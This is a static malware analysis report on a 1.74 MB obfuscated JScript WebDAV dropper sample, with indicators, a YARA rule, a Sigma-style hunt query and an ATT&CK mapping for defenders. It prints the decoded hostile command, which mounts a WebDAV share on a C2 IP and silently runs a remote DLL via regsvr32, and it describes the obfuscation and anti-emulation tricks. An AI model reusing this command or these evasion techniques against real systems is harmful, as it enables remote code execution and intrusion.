27e35f3c0ef769b366b545186e8dc959273fdda68839e3fa3ed99a02b3fa4b55unclassified-js-webdav-dropper: 27e35f3c — 1.74 MB JScript with 1,838-char variable-name padding, 62-entry noise-key dictionary, PowerShell -EncodedCommand wrapper
Executive Summary
The one-hundred-and-fifth confirmed sibling in the WebDAV dropper family. At 1.74 MB it is the largest observed sample, inflated by a 1,838-character variable name and 407 bracket-reference concatenations assembling a PowerShell -EncodedCommand payload. The decoded payload mounts \\94.159.113.79@8888\DavWWWRoot\ via net use and silently registers 27729456617937.dll via regsvr32 /s. A timeout 1 anti-emulation gate is present inside the encoded command. Same C2 IP as five prior siblings (fe261d49, be172014, dc76a67d, 9665f822, 26666aa2).
What It Is
- SHA-256:
27e35f3c0ef769b366b545186e8dc959273fdda68839e3fa3ed99a02b3fa4b55 - File size: 1,787,048 bytes (1.74 MB) ^[file.txt]
- Format: Single-line ASCII JScript, no line terminators ^[file.txt]
- Preliminary family: unclassified-js-webdav-dropper (105th confirmed sibling)
- Obfuscation: JScript dictionary lookup-table (62 entries, random noise keys), 1,838-character extreme variable-name padding
- Execution: PowerShell
-EncodedCommandwrapper →cmd /c net use+regsvr32 /s - Static only — no CAPE detonation (JScript not a supported binary class) ^[dynamic-analysis.md]
How It Works
- A single object declaration with a 1,838-character lowercase-alphabet variable name is assigned an object literal with 62 properties. Each property key is a random noise string (1,322–2,276 chars); each value is a single-character string literal. ^[strings.txt]
- A payload assembly region uses 407 bracket-reference concatenations (
var['noise_key1']+var['noise_key2']+...) to construct a string that is passed toFunction(''+assembled_string+'',0,false). ^[strings.txt] - The assembled expression evaluates to:
(new Function('return this'))()['WScript']['CreateObject']('WScript.Shell')['run']('powershell -EncodedCommand <base64>')^[strings.txt] - The Base64 payload decodes from UTF-16LE to:
timeout 1;cmd /c net use \\94.159.113.79@8888\davwwwroot\;cmd /c regsvr32 /s \\94.159.113.79@8888\davwwwroot\27729456617937.dll
Key structural observation: this sample wraps the command in a PowerShell -EncodedCommand layer (UTF-16LE Base64), unlike siblings like f2316aaf or f346e80d that invoke WScript.Shell.run() directly. The timeout 1 anti-emulation gate is embedded inside the encoded payload, not at the JScript layer.
C2 Infrastructure
| Indicator | Value |
|---|---|
| WebDAV mount | \\94.159.113.79@8888\DavWWWRoot\ |
| Payload DLL | 27729456617937.dll |
| Execution | regsvr32 /s \\94.159.113.79@8888\DavWWWRoot\27729456617937.dll |
| C2 subnet | 94.159.113.0/24 (twelve confirmed siblings) |
| Anti-emulation | timeout 1 (inside PowerShell payload) |
Interesting Tidbits
- Largest file in family: At 1.74 MB, this is the biggest sibling observed (vs. 1.25 MB for
86140a690cfd). The bloat is purely from the 1,838-char variable name and 407 bracket-reference concatenations with extremely long keys. ^[strings.txt] - PowerShell EncodedCommand wrapper: Unlike the direct-execution siblings (
f2316aaf,f346e80d,ff3c6d0c), this sample encodes the payload in UTF-16LE and invokes it viapowershell -EncodedCommand. This adds one hop in the parent-child chain (wscript.exe→powershell.exe→cmd.exe) and may evade simpler WScript.Shell-run telemetry. ^[strings.txt] timeout 1inside encoded payload: The anti-emulation gate is not visible at the JScript layer; it lives inside the Base64 blob, making static detection harder for tools that only surface the outer script.- Sixth sibling on
94.159.113.79: Joinsfe261d49(68th),be172014(74th),dc76a67d(79th),9665f822(102nd), and26666aa2(104th) on this exact IP. The subnet has been the dominant C2 block since the 64th sibling. ^[entities/unclassified-js-webdav-dropper.md]
Deployable Signatures
YARA rule
rule WEBDAV_JS_DictDropper_27e35f3c {
meta:
description = "JScript WebDAV dropper with 62-entry dictionary lookup-table obfuscation, extreme variable-name padding, and PowerShell EncodedCommand wrapper"
author = "PacketPursuit"
date = "2026-07-25"
hash = "27e35f3c0ef769b366b545186e8dc959273fdda68839e3fa3ed99a02b3fa4b55"
strings:
$a = /[a-z]{1800,}=\[\];/
$b = "Function(''"
$c = "DavWWWRoot"
$d = "EncodedCommand"
$e = "regsvr32"
$f = /net use \\\\[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}@8888/
condition:
all of ($a,$b,$c,$d,$e) or ($f and $c and $e)
}
Behavioral hunt query (Sigma-like)
title: WebDAV JS Dropper - PowerShell EncodedCommand + regsvr32 UNC Execution
detection:
selection:
ParentImage|endswith:
- '\wscript.exe'
- '\cscript.exe'
CommandLine|contains|all:
- 'powershell'
- '-EncodedCommand'
CommandLine|re:
- '(?i)regsvr32.*\\\\[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+.*davwwwroot.*\.dll'
condition: selection
IOC list
| Type | Value |
|---|---|
| SHA-256 | 27e35f3c0ef769b366b545186e8dc959273fdda68839e3fa3ed99a02b3fa4b55 |
| C2 IP | 94.159.113.79:8888 |
| Payload DLL | 27729456617937.dll |
| WebDAV UNC | \\94.159.113.79@8888\DavWWWRoot\ |
Behavioral fingerprint
This sample is a single-line JScript blob (1.74 MB) declaring an object with an extremely long lowercase-alphabet variable name (~1,800 chars), 62 noise-key properties mapping to single characters, and 407 bracket-index lookups assembling a PowerShell -EncodedCommand payload. The encoded command decodes to timeout 1; net use mounting a WebDAV share on 94.159.113.79:8888, followed by regsvr32 /s loading a remote DLL. No sandbox gate at the JScript layer; anti-emulation is hidden inside the Base64 blob.
Detection Signatures
| Tactic | Technique | Evidence |
|---|---|---|
| Execution | T1059.005 (Visual Basic / JScript) | JScript/WScript carrier ^[strings.txt] |
| Execution | T1059.001 (PowerShell) | powershell -EncodedCommand wrapper ^[strings.txt] |
| Execution | T1218.010 (Regsvr32) | regsvr32 /s \\C2\share\*.dll ^[strings.txt] |
| Defense Evasion | T1218 (System Binary Proxy Execution) | powershell.exe and regsvr32 are signed system binaries ^[strings.txt] |
| Defense Evasion | T1027 (Obfuscated Files or Information) | 62-entry dictionary lookup-table obfuscation, UTF-16LE Base64 payload ^[strings.txt] |
| Defense Evasion | T1497.001 (Virtualization/Sandbox Evasion) | timeout 1 anti-emulation gate inside encoded payload ^[strings.txt] |
| Command & Control | T1071.001 (Web Protocols) | WebDAV over HTTP (\\94.159.113.79@8888\DavWWWRoot\) ^[strings.txt] |
| Command & Control | T1105 (Ingress Tool Transfer) | net use mounts share; regsvr32 fetches and loads remote DLL ^[strings.txt] |
References
- unclassified-js-webdav-dropper — cluster entity page
- js-dictionary-char-lookup-obfuscation — technique page
- webdav-regsvr32-dll-sideloading — related technique page
- MalwareBazaar / abuse.ch ingestion (SHA-256
27e35f3c...)
Provenance
Analysis performed 2026-07-25 on pp-hermes (<lan>). Tools: Python 3.11 regex extraction (manual dictionary extraction, UTF-16LE Base64 decode), file (file.txt), strings (strings.txt). No CAPE detonation — JScript is not a supported binary class. ^[sample 27e35f3c/file.txt] ^[sample 27e35f3c/strings.txt]